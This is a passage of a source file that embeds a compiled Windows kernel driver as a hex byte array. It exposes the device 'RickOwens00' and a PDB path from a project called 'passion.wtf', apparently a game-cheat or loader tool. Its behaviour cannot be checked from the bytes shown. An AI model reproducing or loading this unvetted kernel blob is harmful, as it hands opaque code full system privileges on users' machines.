0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1F, 0x80, 314 | 0x00, 0x00, 0x00, 0x00, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 0xE9, 0x06, 0x49, 315 | 0x83, 0xE0, 0x3F, 0x0F, 0x18, 0x44, 0x11, 0x40, 0xEB, 0x2E, 0x66, 0x66, 316 | 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 317 | 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 318 | 0x00, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 319 | 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x0F, 0x10, 0x0C, 0x11, 320 | 0x0F, 0x10, 0x54, 0x11, 0x10, 0x0F, 0x10, 0x5C, 0x11, 0x20, 0x0F, 0x10, 321 | 0x64, 0x11, 0x30, 0x0F, 0x2B, 0x41, 0xF0, 0x48, 0x83, 0xC1, 0x40, 0x0F, 322 | 0x18, 0x44, 0x11, 0x40, 0x49, 0xFF, 0xC9, 0x0F, 0x2B, 0x49, 0xC0, 0x0F, 323 | 0x2B, 0x51, 0xD0, 0x0F, 0x2B, 0x59, 0xE0, 0x0F, 0x28, 0xC4, 0x75, 0xCC, 324 | 0x0F, 0xAE, 0xF8, 0xE9, 0x33, 0xFF, 0xFF, 0xFF, 0x0F, 0x1F, 0x40, 0x00, 325 | 0x49, 0x03, 0xC8, 0x0F, 0x10, 0x44, 0x11, 0xF0, 0x48, 0x83, 0xE9, 0x10, 326 | 0x49, 0x83, 0xE8, 0x10, 0xF6, 0xC1, 0x0F, 0x74, 0x18, 0x4C, 0x8B, 0xD9, 
327 | 0x48, 0x83, 0xE1, 0xF0, 0x0F, 0x10, 0x0C, 0x11, 0x41, 0x0F, 0x11, 0x03, 328 | 0x0F, 0x28, 0xC1, 0x4C, 0x8B, 0xC1, 0x4C, 0x2B, 0xC0, 0x4D, 0x8B, 0xC8, 329 | 0x49, 0xC1, 0xE9, 0x06, 0x74, 0x39, 0x49, 0x83, 0xE0, 0x3F, 0xEB, 0x04, 330 | 0x0F, 0x1F, 0x40, 0x00, 0x0F, 0x10, 0x4C, 0x11, 0xF0, 0x0F, 0x10, 0x54, 331 | 0x11, 0xE0, 0x0F, 0x10, 0x5C, 0x11, 0xD0, 0x0F, 0x10, 0x64, 0x11, 0xC0, 332 | 0x0F, 0x29, 0x01, 0x48, 0x83, 0xE9, 0x40, 0x49, 0xFF, 0xC9, 0x0F, 0x29, 333 | 0x49, 0x30, 0x0F, 0x29, 0x51, 0x20, 0x0F, 0x29, 0x59, 0x10, 0x0F, 0x28, 334 | 0xC4, 0x75, 0xD1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 0xE9, 0x04, 0x74, 0x19, 335 | 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x29, 0x01, 0x0F, 336 | 0x10, 0x44, 0x11, 0xF0, 0x48, 0x83, 0xE9, 0x10, 0x49, 0xFF, 0xC9, 0x75, 337 | 0xEF, 0x49, 0x83, 0xE0, 0x0F, 0x74, 0x0F, 0x4C, 0x8B, 0xD9, 0x4D, 0x2B, 338 | 0xD8, 0x41, 0x0F, 0x10, 0x0C, 0x13, 0x41, 0x0F, 0x11, 0x0B, 0x0F, 0x29, 339 | 0x01, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 340 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 341 | 0x48, 0x8B, 0xC1, 0x0F, 0xB6, 0xD2, 0x49, 0xB9, 0x01, 0x01, 0x01, 0x01, 342 | 0x01, 0x01, 0x01, 0x01, 0x49, 0x0F, 0xAF, 0xD1, 0x66, 0x48, 0x0F, 0x6E, 343 | 0xC2, 0x0F, 0x16, 0xC0, 0x49, 0x83, 0xF8, 0x40, 0x72, 0x6E, 0xF6, 0x05, 344 | 0x17, 0x14, 0x00, 0x00, 0x02, 0x74, 0x0D, 0x49, 0x81, 0xF8, 0x20, 0x03, 345 | 0x00, 0x00, 0x0F, 0x83, 0x08, 0x01, 0x00, 0x00, 0x0F, 0x11, 0x01, 0x4C, 346 | 0x03, 0xC1, 0x48, 0x83, 0xC1, 0x10, 0x48, 0x83, 0xE1, 0xF0, 0x4C, 0x2B, 347 | 0xC1, 0x49, 0x83, 0xF8, 0x40, 0x72, 0x47, 0x4A, 0x8D, 0x54, 0x01, 0xF0, 348 | 0x4E, 0x8D, 0x4C, 0x01, 0xD0, 0x49, 0x83, 0xE1, 0xF0, 0x49, 0xC1, 0xE8, 349 | 0x06, 0x0F, 0x29, 0x01, 0x0F, 0x29, 0x41, 0x10, 0x48, 0x83, 0xC1, 0x40, 350 | 0x49, 0xFF, 0xC8, 0x0F, 0x29, 0x41, 0xE0, 0x0F, 0x29, 0x41, 0xF0, 0x75, 351 | 0xE8, 0x41, 0x0F, 0x29, 0x01, 0x41, 0x0F, 0x29, 0x41, 0x10, 0x41, 0x0F, 352 | 0x29, 0x41, 0x20, 0x0F, 0x11, 0x02, 0xC3, 
0x0F, 0x1F, 0x44, 0x00, 0x00, 353 | 0x49, 0x83, 0xF8, 0x10, 0x72, 0x2A, 0x4D, 0x8D, 0x4C, 0x08, 0xF0, 0x49, 354 | 0x83, 0xE0, 0x20, 0x0F, 0x11, 0x01, 0x49, 0xD1, 0xE8, 0x41, 0x0F, 0x11, 355 | 0x01, 0x42, 0x0F, 0x11, 0x04, 0x01, 0x49, 0xF7, 0xD8, 0x43, 0x0F, 0x11, 356 | 0x04, 0x01, 0xC3, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 357 | 0x49, 0x83, 0xF8, 0x04, 0x72, 0x2A, 0x4D, 0x8D, 0x4C, 0x08, 0xFC, 0x49, 358 | 0x83, 0xE0, 0x08, 0x89, 0x11, 0x49, 0xD1, 0xE8, 0x41, 0x89, 0x11, 0x42, 359 | 0x89, 0x14, 0x01, 0x49, 0xF7, 0xD8, 0x43, 0x89, 0x14, 0x01, 0xC3, 0x66, 360 | 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 361 | 0x4D, 0x85, 0xC0, 0x74, 0x11, 0x88, 0x11, 0x4E, 0x8D, 0x4C, 0x01, 0xFE, 362 | 0x49, 0x83, 0xF8, 0x01, 0x74, 0x04, 0x66, 0x41, 0x89, 0x11, 0xC3, 0xCC, 363 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 364 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 365 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 366 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 367 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x57, 0xF6, 0x05, 0xF8, 368 | 0x12, 0x00, 0x00, 0x01, 0x74, 0x32, 0x48, 0x8B, 0xF9, 0x4C, 0x03, 0xC1, 369 | 0x0F, 0x11, 0x01, 0x48, 0x83, 0xC7, 0x40, 0x0F, 0x11, 0x41, 0x10, 0x48, 370 | 0x83, 0xE7, 0xC0, 0x0F, 0x11, 0x41, 0x20, 0x4C, 0x2B, 0xC7, 0x0F, 0x11, 371 | 0x41, 0x30, 0x49, 0x8B, 0xC8, 0x4C, 0x8B, 0xC8, 0x66, 0x48, 0x0F, 0x7E, 372 | 0xC0, 0xF3, 0xAA, 0x49, 0x8B, 0xC1, 0x5F, 0xC3, 0xE8, 0x3F, 0x00, 0x00, 373 | 0x00, 0xEB, 0xC7, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 374 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 375 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 376 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 377 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 378 | 0xCC, 0xCC, 
0xCC, 0xCC, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x50, 0x48, 379 | 0x83, 0xEC, 0x30, 0x0F, 0x29, 0x44, 0x24, 0x20, 0xE8, 0x2B, 0xFA, 0xFF, 380 | 0xFF, 0x0F, 0x28, 0x44, 0x24, 0x20, 0x48, 0x83, 0xC4, 0x30, 0x58, 0x59, 381 | 0x5A, 0x41, 0x58, 0x41, 0x59, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 382 | 0xCC, 0xCC, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 383 | 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 384 | 0x63, 0x00, 0x6B, 0x00, 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 385 | 0x73, 0x00, 0x30, 0x00, 0x30, 0x00, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 386 | 0xCC, 0xCC, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x6F, 0x00, 0x73, 0x00, 387 | 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 388 | 0x73, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 0x63, 0x00, 0x6B, 0x00, 389 | 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x30, 0x00, 390 | 0x30, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x44, 0x00, 0x72, 0x00, 0x69, 0x00, 391 | 0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 392 | 0x63, 0x00, 0x6B, 0x00, 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 393 | 0x73, 0x00, 0x30, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 394 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 395 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 396 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 397 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 398 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 399 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 400 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 401 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 402 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 403 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 404 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 405 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 406 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 407 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 408 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 409 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 410 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 411 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 412 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 413 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 414 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 415 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 416 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 417 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 418 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 419 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 420 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 421 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 422 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 423 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 424 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 425 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 426 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 427 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 428 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 429 | 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 430 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 431 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA8, 0x50, 0x00, 0x00, 432 | 0x00, 0x00, 0x00, 0x00, 0xC0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 433 | 0xD0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x50, 0x00, 0x00, 434 | 0x00, 0x00, 0x00, 0x00, 0xF4, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 435 | 0x0A, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1C, 0x51, 0x00, 0x00, 436 | 0x00, 0x00, 0x00, 0x00, 0x34, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 437 | 0x4A, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x51, 0x00, 0x00, 438 | 0x00, 0x00, 0x00, 0x00, 0x72, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 439 | 0x90, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA2, 0x51, 0x00, 0x00, 440 | 0x00, 0x00, 0x00, 0x00, 0xB8, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 441 | 0xDA, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 442 | 0x00, 0x00, 0x00, 0x00, 0x80, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 443 | 0xA0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0x80, 0x18, 0x00, 0x40, 444 | 0x01, 0x00, 0x00, 0x00, 0xC0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 445 | 0xC0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 446 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0x10, 0x00, 0x00, 447 | 0x60, 0x10, 0x00, 0x00, 0xE0, 0x13, 0x00, 0x00, 0xC0, 0x17, 0x00, 0x00, 448 | 0x80, 0x18, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x00, 0x80, 0x1D, 0x00, 0x00, 449 | 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 450 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 451 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 452 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 453 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 454 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 455 | 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 456 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x30, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 457 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 458 | 0x00, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 459 | 0x88, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0xB0, 0x20, 0x00, 0x40, 460 | 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 461 | 0x00, 0x45, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 462 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 463 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 464 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 465 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 466 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 467 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 468 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 469 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 470 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 471 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 472 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 473 | 0x98, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0xA0, 0x20, 0x00, 0x40, 474 | 0x01, 0x00, 0x00, 0x00, 0xA8, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 475 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 476 | 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 477 | 0x58, 0x00, 0x00, 0x00, 0x80, 0x22, 0x00, 0x00, 0x80, 0x16, 0x00, 0x00, 478 | 0x00, 0x00, 0x00, 0x00, 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 479 | 0x0D, 0x00, 0x00, 0x00, 0x3C, 0x01, 0x00, 0x00, 0xD8, 0x22, 0x00, 0x00, 480 | 0xD8, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 481 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 482 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 483 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 484 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 485 | 0x52, 0x53, 0x44, 0x53, 0x62, 0x0C, 0xA7, 0x30, 0x17, 0x2E, 0xF0, 0x43, 486 | 0xBF, 0x1D, 0xA8, 0xC9, 0xD4, 0x83, 0x39, 0x6C, 0x02, 0x00, 0x00, 0x00, 487 | 0x43, 0x3A, 0x5C, 0x55, 0x73, 0x65, 0x72, 0x73, 0x5C, 0x53, 0x69, 0x6D, 488 | 0x6F, 0x6E, 0x5C, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x5C, 0x72, 0x65, 489 | 0x70, 0x6F, 0x73, 0x5C, 0x70, 0x61, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x2E, 490 | 0x77, 0x74, 0x66, 0x5C, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x5C, 0x64, 0x72, 491 | 0x69, 0x76, 0x65, 0x72, 0x5C, 0x64, 0x72, 0x69, 0x76, 0x65, 0x72, 0x2E, 492 | 0x70, 0x64, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 493 | 0x90, 0x08, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 494 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x18, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 495 | 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 0x24, 0x30, 0x30, 0x00, 496 | 0x00, 0x19, 0x00, 0x00, 0xB0, 0x04, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 497 | 0x74, 0x24, 0x6D, 0x6E, 0x24, 0x32, 0x31, 0x00, 0xB0, 0x1D, 0x00, 0x00, 498 | 0x88, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x73, 0x00, 499 | 0x00, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 500 | 0x74, 0x61, 0x24, 0x35, 0x00, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 501 | 0x30, 0x00, 0x00, 0x00, 0x2E, 0x30, 0x30, 0x63, 0x66, 0x67, 0x00, 0x00, 502 | 0xB0, 0x20, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x2E, 0x67, 0x66, 0x69, 503 | 0x64, 0x73, 0x00, 0x00, 0xD0, 0x20, 0x00, 0x00, 0xB0, 0x01, 0x00, 0x00, 504 | 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x80, 0x22, 0x00, 0x00, 505 | 0xC0, 0x01, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, 506 | 0x7A, 0x7A, 0x64, 
0x62, 0x67, 0x00, 0x00, 0x00, 0x40, 0x24, 0x00, 0x00, 507 | 0xD8, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 508 | 0x00, 0x30, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x2E, 0x64, 0x61, 0x74, 509 | 0x61, 0x00, 0x00, 0x00, 0x50, 0x30, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 510 | 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 511 | 0xE4, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 512 | 0x00, 0x50, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 513 | 0x74, 0x61, 0x24, 0x32, 0x00, 0x00, 0x00, 0x00, 0x14, 0x50, 0x00, 0x00, 514 | 0x14, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 0x74, 0x61, 0x24, 0x33, 515 | 0x00, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 516 | 0x2E, 0x69, 0x64, 0x61, 0x74, 0x61, 0x24, 0x34, 0x00, 0x00, 0x00, 0x00, 517 | 0xA8, 0x50, 0x00, 0x00, 0x5C, 0x01, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 518 | 0x74, 0x61, 0x24, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 519 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 520 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 521 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 522 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x07, 0x04, 0x00, 0x01, 0x16, 0x00, 0x06, 523 | 0x07, 0x01, 0x29, 0x00, 0x02, 0x14, 0x0A, 0x00, 0x02, 0x16, 0x00, 0x06, 524 | 0x14, 0x64, 0x08, 0x00, 0x14, 0x54, 0x07, 0x00, 0x14, 0x34, 0x06, 0x00, 525 | 0x14, 0x32, 0x10, 0x70, 0x02, 0x06, 0x04, 0x00, 0x02, 0x16, 0x00, 0x06, 526 | 0x06, 0x32, 0x02, 0x30, 0x02, 0x16, 0x0A, 0x00, 0x0B, 0x16, 0x00, 0x06, 527 | 0x16, 0x72, 0x0F, 0xF0, 0x0D, 0xE0, 0x0B, 0xC0, 0x09, 0x70, 0x08, 0x60, 528 | 0x07, 0x30, 0x06, 0x50, 0x02, 0x10, 0x08, 0x00, 0x02, 0x16, 0x00, 0x06, 529 | 0x10, 0x64, 0x0A, 0x00, 0x10, 0x34, 0x09, 0x00, 0x10, 0x52, 0x0C, 0x70, 530 | 0x02, 0x04, 0x03, 0x00, 0x01, 0x16, 0x00, 0x06, 0x04, 0x42, 0x00, 0x00, 531 | 0x02, 0x18, 0x0C, 0x00, 0x06, 0x16, 0x00, 0x06, 0x18, 0x64, 0x0E, 
